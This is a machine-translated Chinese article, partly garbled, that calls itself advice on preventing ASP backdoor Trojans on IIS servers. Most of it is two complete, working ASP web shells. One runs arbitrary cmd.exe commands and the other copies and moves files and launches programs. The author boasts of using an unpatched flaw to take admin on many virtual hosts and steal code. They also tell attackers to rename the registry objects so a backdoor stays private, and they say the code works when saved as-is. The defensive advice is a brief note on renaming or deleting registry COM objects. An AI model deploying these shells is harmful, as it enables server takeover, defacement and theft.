With ASP technology, network technology development based on the ASP's Web site more and more on the ASP technology can be said to have IIS server is a windows system is a basic function. However, ASP-based technology backdoor Trojan horse, more and more and more and more powerful features. As the ASP server itself is a tribute to provide services, so that the ASP script backdoor Trojan horse, antivirus software will not be killing. Hackers have been referred to as "the killing will never be the back door." Due to its high level of hidden and difficult to killing, on the Web site of a serious security threat. Therefore ASP for the prevention and removal of Trojan horse for our management staff has set a higher technical requirements. I combine personal experience, to talk about the comparison of two typical ways to prevent the ASP Trojan, we would like to be able to help.
The following is the first Trojan code:
<title> ASP Shell </ title>
<% @ Language = VBScript%>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
- Create the COM objects that we will be using --
Set oScript = Server.CreateObject ( "WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject ( "WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject ( "Scripting.FileSystemObject")
- Check for a command that we have posted --
szCMD = Request.Form ( ". CMD")
If (szCMD <> "") Then
- Use a poor mans pipe ... a temp file --
szTempFile = "C:" & oFileSys.GetTempName ()
Call oScript.Run ( "cmd.exe / c" & szCMD & ">" & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action ="<%= Request.ServerVariables ( "URL")%> "method =" POST ">
<input type = text name = ". CMD" size = 45 value ="<%= szCMD%> ">
<input type=submit value="执行命令">
</ FORM>
<PRE> <%
If (IsObject (oFile)) Then
- Read the output from our command and remove the temp file --
On Error Resume Next
Response.Write Server.HTMLEncode (oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile (szTempFile, True)
End If
%>
</ BODY>
</ HTML>
After the operation the following plans: the command line, enter the DIR command point will be able to see the implementation of the directory! ! It can use a variety of DOS commands, such as: copy, net, netstat, and so on.
However, the implementation of its default permissions only GUEST, which is IUSR_COMPUTER implementation of the rights of users. Of course, if you IUSR_COMPUTER accession to the user group administrator, you have the administrator privileges. This is a Trojan horse is characterized by the use of very convenient. Almost want to be in the DOS command line window to make the same xx. However, if the server limits the FSO (free component uploaded), it is not used. There is an increase in the future of virtual server host, there is no way to use. Can only be "the default Web site", so it's relatively narrow scope of application.
The guard let us look at the ways that it knew of the code:
Set oScript = Server.CreateObject ( "WSCRIPT.SHELL") "have established a oScript the WSCRIPT.SHELL target for the implementation of the order"
Set oScriptNet = Server.CreateObject ( "WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject ( "Scripting.FileSystemObject")
The top three lines of code to create a WSCRIPT.SHELL, WSCRIPT.NETWORK, Scripting.FileSystemObject three objects, as long as we are in the registry to control WSCRIPT.SHELL name of the object or remove it. Plans are as follows: It is worth noting that: we should "WSCRIPT.SHELL" and "WSCRIPT.SHELL.1" These two should be renamed or deleted. Because if we amend the "WSCRIPT.SHELL" items. So long as the hackers to modify the code as follows: Set oScript = Server.CreateObject ( "WSCRIPT.SHELL.1") on the back door Trojans can be carried out.
You may have thought that we in the "WSCRIPT.SHELL" and "WSCRIPT.SHELL.1" name, or certainly vulnerable to hackers to guess, because, for example: you put "WSCRIPT.SHELL" changed " WSCRIPT.SHELL888 ". As long as hackers have the code changed to: Set oScript = Server.CreateObject ( "WSCRIPT.SHELL888"), the Trojans can be carried out. There will have to modify the registry after re-starting WEB services, set up will work.
Then let us look at a backdoor Trojan horse program ASP code:
<% response.write "<font size=6 color=red> can only run one xx for </ font>"%>
<% response.write now ()%>< BR> procedure where the physical path:
<% response.write request.servervariables ( "APPL_PHYSICAL_PATH")%>
<html>
<title> asps shell.application backdoor </ title>
<body>
<form action ="<%= Request.ServerVariables ( "URL")%> "method =" POST ">
<input type = text name = text value ="<%= szCMD%> "> browse the directory to enter <br>
<input type = text name = text1 value ="<%= szCMD1%> ">
copy
<input type = text name = text2 value ="<%= szCMD2 %>">< br>
<input type = text name = text3 value ="<%= szCMD3%> ">
move
<input type = text name = text4 value ="<%= szCMD4 %>">< br>
Path: <input type = text name = text5 value ="<%= szCMD5%> ">
Procedure: <input type = text name = text6 value ="<%= szCMD6 %>">< br>
<input type=submit name=sb value=发送命令>
</ form>
</ body>
</ html>
<%
szCMD = Request.Form ( "text") Directory Browsing
if (szCMD <> "") then
set shell = server.createobject ( "shell.application") set up shell object
set fod1 = shell.namespace (szcmd)
set foditems = fod1.items
for each co in foditems
response.write "<font color=red>" & co.path & "-----" & co.size & "</ font> <br>"
next
end if
%> <%
szCMD1 = Request.Form ( "text1") copies of the directory can not copy files
szCMD2 = Request.Form ( "text2")
if szcmd1 <> "" and szcmd2 <> "" then
set shell1 = server.createobject ( "shell.application") set up shell object
set fod1 = shell1.namespace (szcmd2)
for i = len (szcmd1) to 1 step -1
if mid (szcmd1, i, 1) = "" then
path = left (szcmd1, i-1)
exit for
end if
next
if len (path) = 2 then path = path & ""
path2 = right (szcmd1, len (szcmd1)-i)
set fod2 = shell1.namespace (path)
set foditem = fod2.parsename (path2)
fod1.copyhere foditem
response.write "command completed success!"
end if
%> <%
szCMD3 = Request.Form ( "text3") mobile directory
szCMD4 = Request.Form ( "text4")
if szcmd3 <> "" and szcmd4 <> "" then
set shell2 = server.createobject ( "shell.application") set up shell object
set fod1 = shell2.namespace (szcmd4) for i = len (szcmd3) to 1 step -1
if mid (szcmd3, i, 1) = "" then
path = left (szcmd3, i-1)
exit for
end if
next if len (path) = 2 then path = path & ""
path2 = right (szcmd3, len (szcmd3)-i)
set fod2 = shell2.namespace (path)
set foditem = fod2.parsename (path2)
fod1.movehere foditem
response.write "command completed success!"
end if
%>
<%
szCMD5 = Request.Form ( "text5") to implement procedures to designated trails
szCMD6 = Request.Form ( "text6")
if szcmd5 <> "" and szcmd6 <> "" then
set shell3 = server.createobject ( "shell.application") set up shell object
shell3.namespace (szcmd5). items.item (szcmd6). invokeverb
response.write "command completed success!"
end if
%>
To view the directory, as long as the importation of the directory, send a command point on it. The Trojans can complete the document-COPY, MOVE, and implementation of the program. But many can not command such as: del, net, netstat, and so on. The way the horse ran with the simple function, but use it to a black site is sufficient. For example, we can MOVE Web site's home page to other places, then we will have a COPY of the same name into the hacker's website on the line.
This is the most fatal horse apply to any virtual host, as long as I have to say is a virtual server in the space of the user, I can be the Trojan-up and use it to modify any other user's home page. So what if the virtual space to provide service providers did not patch, it is really dead.
However, in practice I found that many of China's virtual space service providers, in particular, a number of small service providers are not patching. I take advantage of this loophole to get a lot of room for a virtual server ADMIN, and then kind of help them make up the loopholes. Of course, I also want my things - a lot of good software and code. I am using a lot of the ASP program is that their stealing the top down, listening to too difficult, it should be said DOWN down the right.
Closer to home, what do we do to prevent the backdoor Trojan ASP procedures? Let us look at it the code phrase: set shell = server.createobject ( "shell.application"), with just the same way, as long as we "shell.application" and "shell.application.1" item name Or delete it. Remember, if a new name, it is necessary to get a little complicated, not to allow hackers to guess what the. By the way, if your broiler to patching is the best name and the name of the note, which has become a secret of his own by the back door. Finally, these two backdoor Trojan ASP, ASP and how to prevent backdoor Trojan do you sum up: the first Trojan functionally strong, but narrow the scope of the need to support the FSO is "Scripting.FileSystemObject" of support. 2 Although the Trojans less functional, but it is the creation of "shell.application" object. In any virtual hosts are applicable. (This is really too much harm, to provide support for the ASP space administrator, you may have to pay attention!)
In fact, with the top two, according to the ASP Trojan back door of the guard, we might have thought, ASP backdoor Trojan for the prevention, as long as we are in the registry to "shell.application", "WSCRIPT.SHELL" script, and other dangerous objects ( Because they are used to create the script command channel), renamed or deleted, that is, restrictions on the system of "script SHELL" creation, ASP horse will not run again.
Note: The above code to copy for preservation of ASP files can be directly used.
